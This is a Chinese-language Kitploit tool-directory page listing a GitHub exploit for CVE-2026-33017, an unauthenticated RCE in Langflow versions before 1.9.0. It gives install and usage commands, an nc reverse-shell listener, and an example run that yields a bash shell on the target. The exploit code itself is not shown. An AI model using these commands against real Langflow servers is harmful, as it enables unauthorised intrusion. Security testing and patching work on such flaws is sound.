Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-33017-Exploit — Langflow <1.9.0 中的未授权 RCE(CVE-2026-33017)利用 | Kitploit
工具/GitHubGitHub/diamorphine666/cve-2026-33017-exploit
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具
GitHubdiamorphine666/cve-2026-33017-exploit

CVE-2026-33017-Exploit

Langflow <1.9.0 中的未授权 RCE(CVE-2026-33017)利用

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1个月前尚未审核

Fireflow RCE 漏洞利用

通过 build_public_tmp 端点在 Langflow 上实现远程代码执行。
通过公共流程构建端点利用漏洞,在目标上执行反向 Shell。

需求

  • Python 3.8+
  • httpx 库

安装:

root@kitploit:~
pip install httpx

使用方法

root@kitploit:~
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>

参数

  • -u, --url : Langflow 实例的基础 URL(例如 https://flow.example.com/)
  • -l, --lhost : 你的 IP 地址,用于接收反向 Shell
  • -p, --lport : 反向 Shell 的监听端口
  • -f --flow-id : 目标流程 ID(必填 – 通过 /api/v1/flows/ 或 UI 获取)
  • -c --client-id : client_id cookie 值,用于会话标识

示例

  1. 启动监听器:

    root@kitploit:~
    nc -nlvp 9001
    
  2. 运行漏洞利用:

    root@kitploit:~
    python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
    
  3. 如果成功,你将获得一个交互式 bash shell。

重要说明

  • ReadTimeout 是正常的 – 服务器可能无响应,因为 shell 阻塞了 HTTP 请求。只要你在监听器上看到连接,漏洞就已利用成功。
  • 需要有效的 flow-id。通过 GET /api/v1/flows 列出所有流程,或从浏览器 URL 复制。
  • 此工具仅用于授权的渗透测试和教育目的。未经明确许可,不得用于针对系统。

受影响版本

  • 修复自定义组件 RCE 之前的 Langflow 版本 <1.9.0

许可证

MIT – 用于教育和道德安全研究。

下载工具